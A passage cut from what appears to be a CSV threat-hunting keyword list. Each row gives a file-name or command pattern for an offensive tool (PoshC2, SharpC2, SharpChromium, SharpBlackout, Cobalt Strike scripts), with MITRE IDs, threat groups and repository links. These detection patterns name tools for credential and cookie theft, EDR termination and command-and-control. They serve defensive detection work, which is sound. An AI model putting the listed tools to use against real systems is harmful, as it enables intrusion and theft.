GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,0,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*ShadowSpray.sln*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,1,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*ShadowSpray-master*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,1,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*ShadowUser/scvhost.exe*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*shareenum.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*shareenumeration*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*SharepointExploiter.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*SharepointSiteExploiter.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*Shares/cme_spider_plus*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*Shares/finduncshar_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*sharkd -a tcp:*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*Sharp Compile*,offensive_tool_keyword,cobaltstrike,SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/SpiderLabs/SharpCompile,1,0,N/A,10,10,289,63,2020-08-07T12:49:36Z,2018-11-01T17:18:52Z -*Sharp_v4_x64*.bin*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Sharp_v4_x86*.bin*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*sharpadidnsdump.*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpAdidnsdumpManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpAdidnsdumpMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpAllowedToAct.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*sharpapplocker*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*SharpAppLocker.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpAzbelt-main*,offensive_tool_keyword,SharpAzbelt,This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,1,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z -*SharpBlackout* -p *,offensive_tool_keyword,SharpBlackout,Terminate AV/EDR leveraging BYOVD attack,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/dmcxblue/SharpBlackout,1,0,N/A,10,1,68,16,2023-08-23T14:44:25Z,2023-08-23T14:16:40Z -*SharpBlackOut.csproj*,offensive_tool_keyword,SharpBlackout,Terminate AV/EDR leveraging BYOVD attack,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/dmcxblue/SharpBlackout,1,1,N/A,10,1,68,16,2023-08-23T14:44:25Z,2023-08-23T14:16:40Z -*SharpBlackout.exe*,offensive_tool_keyword,SharpBlackout,Terminate AV/EDR leveraging BYOVD attack,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/dmcxblue/SharpBlackout,1,1,N/A,10,1,68,16,2023-08-23T14:44:25Z,2023-08-23T14:16:40Z -*SharpBlackOut.pdb*,offensive_tool_keyword,SharpBlackout,Terminate AV/EDR leveraging BYOVD attack,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/dmcxblue/SharpBlackout,1,1,N/A,10,1,68,16,2023-08-23T14:44:25Z,2023-08-23T14:16:40Z -*SharpBlackOut.sln*,offensive_tool_keyword,SharpBlackout,Terminate AV/EDR leveraging BYOVD attack,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/dmcxblue/SharpBlackout,1,1,N/A,10,1,68,16,2023-08-23T14:44:25Z,2023-08-23T14:16:40Z -*SharpBlackout-main*,offensive_tool_keyword,SharpBlackout,Terminate AV/EDR leveraging BYOVD attack,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/dmcxblue/SharpBlackout,1,1,N/A,10,1,68,16,2023-08-23T14:44:25Z,2023-08-23T14:16:40Z -*SharpBlock -*,offensive_tool_keyword,SharpBlock,A method of bypassing EDR active projection DLL by preventing entry point exection,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CCob/SharpBlock,1,0,N/A,10,10,975,147,2021-03-31T09:44:48Z,2020-06-14T10:32:16Z -*SharpBlock.csproj*,offensive_tool_keyword,SharpBlock,A method of bypassing EDR active projection DLL by preventing entry point exection,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CCob/SharpBlock,1,1,N/A,10,10,975,147,2021-03-31T09:44:48Z,2020-06-14T10:32:16Z -*SharpBlock.exe*,offensive_tool_keyword,SharpBlock,A method of bypassing EDR active projection DLL by preventing entry point exection,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CCob/SharpBlock,1,1,N/A,10,10,975,147,2021-03-31T09:44:48Z,2020-06-14T10:32:16Z -*SharpBlock.sln*,offensive_tool_keyword,SharpBlock,A method of bypassing EDR active projection DLL by preventing entry point exection,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CCob/SharpBlock,1,1,N/A,10,10,975,147,2021-03-31T09:44:48Z,2020-06-14T10:32:16Z -*SharpBypassUAC*,offensive_tool_keyword,AD exploitation cheat sheet,Use SharpBypassUAC e.g. from a CobaltStrike beacon,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*SharpBypassUAC.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpC2 *,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,0,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*SharpC2*.cs*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*SharpC2*.exe*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*sharpc2*client-windows.zip*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*SharpC2.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*SharpC2.API*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*SharpC2Event*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*SharpC2Hub*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*SharpC2Webhook*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*SharpCalendar.exe*,offensive_tool_keyword,cobaltstrike,.NET Assembly to Retrieve Outlook Calendar Details,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OG-Sadpanda/SharpCalendar,1,1,N/A,10,10,13,1,2021-10-07T19:42:20Z,2021-10-07T17:11:46Z -*SharpCat.exe*,offensive_tool_keyword,cobaltstrike,C# alternative to the linux cat command... Prints file contents to console. For use with Cobalt Strike's Execute-Assembly,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OG-Sadpanda/SharpCat,1,1,N/A,10,10,16,5,2021-07-15T15:01:02Z,2021-07-15T14:57:53Z -*SharpChisel.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpChrome backupkey*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpChrome.cs*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpChrome.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*sharpchromium *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*SharpChromium.csproj*,offensive_tool_keyword,SharpChromium,.NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.,T1555.003 - T1114.001 - T1555.004,TA0006 - TA0003,N/A,N/A,Credential Access,https://github.com/djhohnstein/SharpChromium,1,1,N/A,10,7,608,98,2020-10-23T22:28:13Z,2018-08-06T21:25:21Z -*SharpChromium.exe*,offensive_tool_keyword,SharpChromium,.NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.,T1555.003 - T1114.001 - T1555.004,TA0006 - TA0003,N/A,N/A,Credential Access,https://github.com/djhohnstein/SharpChromium,1,1,N/A,10,7,608,98,2020-10-23T22:28:13Z,2018-08-06T21:25:21Z -*SharpChromium.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpChromium.sln*,offensive_tool_keyword,SharpChromium,.NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.,T1555.003 - T1114.001 - T1555.004,TA0006 - TA0003,N/A,N/A,Credential Access,https://github.com/djhohnstein/SharpChromium,1,1,N/A,10,7,608,98,2020-10-23T22:28:13Z,2018-08-06T21:25:21Z -*SharpChromium-master*,offensive_tool_keyword,SharpChromium,.NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.,T1555.003 - T1114.001 - T1555.004,TA0006 - TA0003,N/A,N/A,Credential Access,https://github.com/djhohnstein/SharpChromium,1,1,N/A,10,7,608,98,2020-10-23T22:28:13Z,2018-08-06T21:25:21Z -*SharpClipHistory*,offensive_tool_keyword,SharpClipHistory,SharpClipHistory is a .NET 4.5 application written in C# that can be used to read the contents of a users clipboard history in Windows 10 starting from the 1809 Build.,T1115 - T1113 - T1015 - T1053 - T1059,TA0003 - TA0007,N/A,N/A,Information Gathering,https://github.com/FSecureLABS/SharpClipHistory,1,1,N/A,N/A,2,179,36,2020-01-23T13:39:13Z,2019-04-25T22:17:08Z -*sharpcloud.cna*,offensive_tool_keyword,SharpCloud,Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.,T1083 - T1059.001 - T1114.002,TA0007 - TA0002 ,N/A,N/A,Credential 